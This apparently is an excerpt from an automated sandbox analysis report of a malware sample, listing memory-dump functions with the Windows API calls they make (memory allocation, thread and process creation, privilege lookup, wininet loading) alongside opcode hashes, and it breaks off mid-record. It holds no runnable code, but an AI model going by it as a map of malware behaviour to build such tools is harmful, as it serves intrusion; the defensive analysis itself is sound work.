Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: c6bbb2ea9f2ef54c1feb5f0bde67cf4a33824a34bddb91192abafa6ab25f7dd9
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: F4F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158248BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 008683B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00852D11,00002000,00003000,00000004), ref: 008683E9

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 9d1b29544711e1004470c8a0b2ab9057239878894d65de93a08495011ee82f47
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 0DF015B2200208ABCB14DF89CC81EAB77ADEF88750F118248BE0897241CA30F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 008682FA, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00863D40,?,?,00863D40,00000000,FFFFFFFF), ref: 00868325

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d5ced22e336d07b8ef1b581108d056f34138aa8af4d793cc13f3e3edc8d9d69b
Instruction ID: 829ea8df10f94151b78216de3e5d4420e828ba8808c201e1a1b0a17847c6b10b
Opcode Fuzzy Hash: d5ced22e336d07b8ef1b581108d056f34138aa8af4d793cc13f3e3edc8d9d69b
Instruction Fuzzy Hash: ABE01275200214BBE714EFD8CC45EA77B69EF84760F154555BA5DAB682C970FA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00868300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00863D40,?,?,00863D40,00000000,FFFFFFFF), ref: 00868325

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 07ebcca4561b05c2b4505dc2a8fd70cad3b5db5f511a970aca284bab6887c3d4
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 8AD01275200214ABD710EF98CC45E97775CEF44750F154555BA1C9B242C970F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 030C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C9A5A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ef9725cccc61f700353aa68e65048b0bf9ef9c042ba1521e000471a4cb2ab24
Instruction ID: 9d83191817856dc1b4b8a0bfa88cf9be2129c109bf05db226f5056b2ef99af2a
Opcode Fuzzy Hash: 8ef9725cccc61f700353aa68e65048b0bf9ef9c042ba1521e000471a4cb2ab24
Instruction Fuzzy Hash: C890026125294542D200A5698C14B0701859BD0343F51D115B0144554CCA5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 030C9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C991A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 606ef761ffee97f295ae043d0ca42a494c7c16010b35ea2238ccde3f0404ef05
Instruction ID: 2dfeaaa2297bd32bfb1b9c540610595eebe6b9036cc491fc0c944abf11da0b62
Opcode Fuzzy Hash: 606ef761ffee97f295ae043d0ca42a494c7c16010b35ea2238ccde3f0404ef05
Instruction Fuzzy Hash: 5D9002B124214902D140B159840474601859BD0341F51D011B5054554E87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 030C99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C99AA

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7408913ad2672cc8274265a4b0906e0a7e545668d4aa5db92428e9c7b29c316d
Instruction ID: aab23d25e3eb2d69111e776514a882031a23dea0bb3fb73597e22828b9f491c7
Opcode Fuzzy Hash: 7408913ad2672cc8274265a4b0906e0a7e545668d4aa5db92428e9c7b29c316d
Instruction Fuzzy Hash: 0A9002A138214942D100A1598414B060185DBE1341F51D015F1054554D8759CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 030C9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C984A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0d3db083ae6998c2231cb958c2a0e357c9a5246ee5d204b173107bf45f040d70
Instruction ID: e862e0c7de1becca422d3cde9644c288a5600e8eed6afa2a7155a305dd3a1bfd
Opcode Fuzzy Hash: 0d3db083ae6998c2231cb958c2a0e357c9a5246ee5d204b173107bf45f040d70
Instruction Fuzzy Hash: 01900261283186525545F15984045074186ABE0281B91D012B1404950C86669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 030C9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C986A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64c5adb57868c7fdd1e5970ba2d13e5f09d099eb07b9b38bfc00d5431a329876
Instruction ID: 504cf1ac134b95da70c4b6b0b6f35ccba8fa495e99273f6dcf1532d531771b3a
Opcode Fuzzy Hash: 64c5adb57868c7fdd1e5970ba2d13e5f09d099eb07b9b38bfc00d5431a329876
Instruction Fuzzy Hash: F790027124214913D111A159850470701899BD0281F91D412B0414558D97968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 030C9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C971A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a40570c88a38d2640d50284cab6646d8a3dc7d89fae8d4d3825b114be7b97dd
Instruction ID: 5344356a1dfaea78d70a164d2263750e1c0c98b243d9af5c66c3d33fee420192
Opcode Fuzzy Hash: 8a40570c88a38d2640d50284cab6646d8a3dc7d89fae8d4d3825b114be7b97dd
Instruction Fuzzy Hash: C990027124214902D100A599940864601859BE0341F51E011B5014555EC7A588917171

Uniqueness

Uniqueness Score: -1.00%

Function 030C9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C978A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11a977895a0c8957f933751e3410a64eaef3430869eb850f5e03afa57d674c61
Instruction ID: d8a487863b33cd5c1faeb5811190017708a4d39c406e600e9590733b65f3e2a4
Opcode Fuzzy Hash: 11a977895a0c8957f933751e3410a64eaef3430869eb850f5e03afa57d674c61
Instruction Fuzzy Hash: 9790026925314502D180B159940860A01859BD1242F91E415B0005558CCA5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 030C9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C9FEA

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 06f4878d2e1cf0015f402dd3ed46ed2ca51432f6646aff7c0db3c559a15dcaec
Instruction ID: 6bdbb48489da764a09808ae50140ba5e76815d2494963989c2202e0bb9d41e12
Opcode Fuzzy Hash: 06f4878d2e1cf0015f402dd3ed46ed2ca51432f6646aff7c0db3c559a15dcaec
Instruction Fuzzy Hash: AD90027135228902D110A159C40470601859BD1241F51D411B0814558D87D588917162

Uniqueness

Uniqueness Score: -1.00%

Function 030C9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C965A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f177b7a6313fd88e56dc4712090b15e3d6a8b9616b05bc5ced5cc8a0451aa17
Instruction ID: daa605460b1b6f603d897cb32e9848e57bbcbc8c321b055ff775a0e2c6382df3
Opcode Fuzzy Hash: 1f177b7a6313fd88e56dc4712090b15e3d6a8b9616b05bc5ced5cc8a0451aa17
Instruction Fuzzy Hash: 0B90027124618D42D140B1598404A4601959BD0345F51D011B0054694D97658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 030C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C966A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 908999af69c58aa95cc66db2357ebc4e02bfe72b1ae2f3bb2b8e048a6d9acd4a
Instruction ID: 49ba478a6b466a567a748f3a6c958e0df33ec8b557184f2b4f95691540c4185c
Opcode Fuzzy Hash: 908999af69c58aa95cc66db2357ebc4e02bfe72b1ae2f3bb2b8e048a6d9acd4a
Instruction Fuzzy Hash: 3090027124214D02D180B159840464A01859BD1341F91D015B0015654DCB558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 030C96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C96DA

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49974fbefe77e91130e64528533753bcc00e312f5bee5b023882e7d663490aa5
Instruction ID: 6a7cfdd3f9edf8b1b08cc7a6169ae9b190de3336d3eeddf3f2e9ceeeb0cf0c15
Opcode Fuzzy Hash: 49974fbefe77e91130e64528533753bcc00e312f5bee5b023882e7d663490aa5
Instruction Fuzzy Hash: 9E90027124214D42D100A1598404B4601859BE0341F51D016B0114654D8755C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 030C96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C96EA

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1f870d7384a5c95a265100d5c570dd451e289769c254718502de8edac5fc482
Instruction ID: f6a52968369c8d2f4aea11490e143c477865933f32878dfa9377b5e81a3cef6f
Opcode Fuzzy Hash: a1f870d7384a5c95a265100d5c570dd451e289769c254718502de8edac5fc482
Instruction Fuzzy Hash: 7F9002712421CD02D110A159C40474A01859BD0341F55D411B4414658D87D588917161

Uniqueness

Uniqueness Score: -1.00%

Function 030C9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C954A

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 447c03886cc9cf2c39f269be024ad3c8f92161c90bf6c4257e49e36fe745cc79
Instruction ID: 80aab778eae4d81a30636316ceacd5944c0a12e5f5f06644c5c37d117422015c
Opcode Fuzzy Hash: 447c03886cc9cf2c39f269be024ad3c8f92161c90bf6c4257e49e36fe745cc79
Instruction Fuzzy Hash: C7900475353145030105F55D470450701C7DFD53D1751D031F1005550CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 030C95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 030C95DA

Memory Dump Source

Source File: 00000009.00000002.955113627.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: true

Associated: 00000009.00000002.955243780.000000000317B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a338cd2624993d41d439e790a52b2e415bfeb5f9f48d11d438717be72a401ba
Instruction ID: c95930ca752b1c66b4b8516714e65530f477618723775c783f71b2c8a849f097
Opcode Fuzzy Hash: 3a338cd2624993d41d439e790a52b2e415bfeb5f9f48d11d438717be72a401ba
Instruction Fuzzy Hash: C39002A1243145034105B1598414616418A9BE0241F51D021F1004590DC66588917165

Uniqueness

Uniqueness Score: -1.00%

Function 00866EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00866F98

Strings

wininet.dll, xrefs: 00866F4E, 00866F57
net.dll, xrefs: 00866F61, 00866FE7, 00866FBF, 00866FCB, 00866FF3

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
Instruction ID: d86170f736d6e05fd8eab7cca90ac24c5cd6aeebb62d2307ac60274449202ea9
Opcode Fuzzy Hash: b50f98344ab47ed974b2589213e9cd93943e64bbfbf8dcd2169a33c92deb350a
Instruction Fuzzy Hash: 42318CB1601704ABC725DF68D8A1FA7B7B8FB88700F00851DF65A9B241E770A955CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00866EE7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00866F98

Strings

wininet.dll, xrefs: 00866F4E, 00866F57
net.dll, xrefs: 00866F61, 00866FBF, 00866FCB

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 91d81dc6b9b7f484b977906070548ad5cebc2d9bf952b8c93e7f807a0ddc1de6
Instruction ID: b3917930f7df83b8021a233e2a235ea0f2ba016810da901a4e20843604c9d280
Opcode Fuzzy Hash: 91d81dc6b9b7f484b977906070548ad5cebc2d9bf952b8c93e7f807a0ddc1de6
Instruction Fuzzy Hash: 1221EFB1601704ABC711DF68DCA1FABB7B4FB88704F10812DF51A9B281E770A555CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 008684E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00853B93), ref: 0086850D

Strings

.z`, xrefs: 008684FC, 00868508

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: f9f4fe6ed83ed1ef4dce17e2b4a0c1d6c5fb4ac1e16c6e33b426290a91cd5e8d
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: CCE01AB1200208ABD714DF59CC45EA777ACEF88750F014554B90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00857270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008572CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008572EB

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
Instruction ID: 68fb418bf03ccfa864f4aef144ba10b0b28489e6972208a87975a49e188ed708
Opcode Fuzzy Hash: f787fd5115f45e17e8f96a40551e57a19faf030edf4e6bc80d94188a7898c0a9
Instruction Fuzzy Hash: C501A731A8022877F720A6989C03FFE776CAB00B51F154114FF08FA1C1E6946A0947F7

Uniqueness

Uniqueness Score: -1.00%

Function 00867013, Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0085CCE0,?,?), ref: 0086705C

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1478c4a06197a86b323d2c4aff8d36dc017fb63580d85a1e35aaefab47291543
Instruction ID: aa1a2c33787439677480b2f51533909c2b03fa39ec3855f222733e5191c13674
Opcode Fuzzy Hash: 1478c4a06197a86b323d2c4aff8d36dc017fb63580d85a1e35aaefab47291543
Instruction Fuzzy Hash: C341A9B2601701ABD325DB68CCA1FE7B3A9FF84344F050519F65ADA281CB70B915CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 00868631, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0085CFB2,0085CFB2,?,00000000,?,?), ref: 00868670

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 5ecabd7698b231703cf38e0cb727f23c986e42d1f35ec4a6afb19fe09c1b906d
Instruction ID: 13ba72169e9bad16f83492511a51035632b76e3520dbcdea131b4d1b018e8a81
Opcode Fuzzy Hash: 5ecabd7698b231703cf38e0cb727f23c986e42d1f35ec4a6afb19fe09c1b906d
Instruction Fuzzy Hash: AD0165B6200208AFCB14DF99CC84EEB77A9EF88350F028659F90D97241CA34E814CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00859B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00859BA2

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 8c2519e8eb056d634e60363d4b501ac7e967b08169888753b2ca67e970bd9b21
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 5C011EB5D0020DABDB10DBA4EC42F9EB7B9EB54319F004195ED18E7281F671EB58CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0086854D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008685A4

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 4a6ac7d64f19329944bdb5150407da6c6eb746561d1e2917cb7e32f3c20dffff
Instruction ID: 263f831fb74ea1a20f8da95aee9d5c1e128df17b713c556b4e5f5ab85b1c0e74
Opcode Fuzzy Hash: 4a6ac7d64f19329944bdb5150407da6c6eb746561d1e2917cb7e32f3c20dffff
Instruction Fuzzy Hash: F601DDB2200108ABCB14CF99CC80EEB37A9AF8C350F158248FA4DE7241C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00868550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008685A4

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 9806b48c8d20958a233d3e291a116b19be8eb4cfe65a62490507dc885c729245
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: AB01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00867020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0085CCE0,?,?), ref: 0086705C

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction ID: e18f5d89c35375a35cf0fb1c2577c2c1ab9a80c5b6451ae2280bc19421e47e91
Opcode Fuzzy Hash: 4b74d86bfe42af7d5fcb5c346ac09a19e00ed37dcbf51293ece7a7ca142cbe85
Instruction Fuzzy Hash: 80E06D333803043AE230659DAC02FA7B29CDB91B20F150026FA0DEA2C1D595F80142A9

Uniqueness

Uniqueness Score: -1.00%

Function 008684A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00863526,?,00863C9F,00863C9F,?,00863526,?,?,?,?,?,00000000,00000000,?), ref: 008684CD

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ecaff31643617c4ed2fc5cf550e4c995af5f703ff472961fe67da8f50c10f5df
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1EE012B1200208ABDB14EF99CC41EA777ACEF88650F118558BA089B282CA30F9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00868640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0085CFB2,0085CFB2,?,00000000,?,?), ref: 00868670

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 1cc8dda208dbdc00a1ca3a4f9e648383b2b01b00f40e44faa6be35a26ad55777
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: C2E01AB1200208ABDB10DF49CC85EE737ADEF88650F018154BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0085D417, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00857C73,?), ref: 0085D44B

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: af94d4dc2f92aafd199c7c2bc57dbe1dadc7f8b6dfd5d8a8ca5a400c7bb6823f
Instruction ID: 1623863d98ae1fbbf56d48c2ebbb5dedeb9460f5ba249ed9abac7d36f20007ba
Opcode Fuzzy Hash: af94d4dc2f92aafd199c7c2bc57dbe1dadc7f8b6dfd5d8a8ca5a400c7bb6823f
Instruction Fuzzy Hash: B0D02B397802007BF710FAA4DC02F55739ABF58740F094020F80DE73C3D620E4014121

Uniqueness

Uniqueness Score: -1.00%

Function 0085D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00857C73,?), ref: 0085D44B

Memory Dump Source

Source File: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 030bc57eecd4d8f9d2f5da7f409d7067945d3941c5f482112a4802199f68182d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
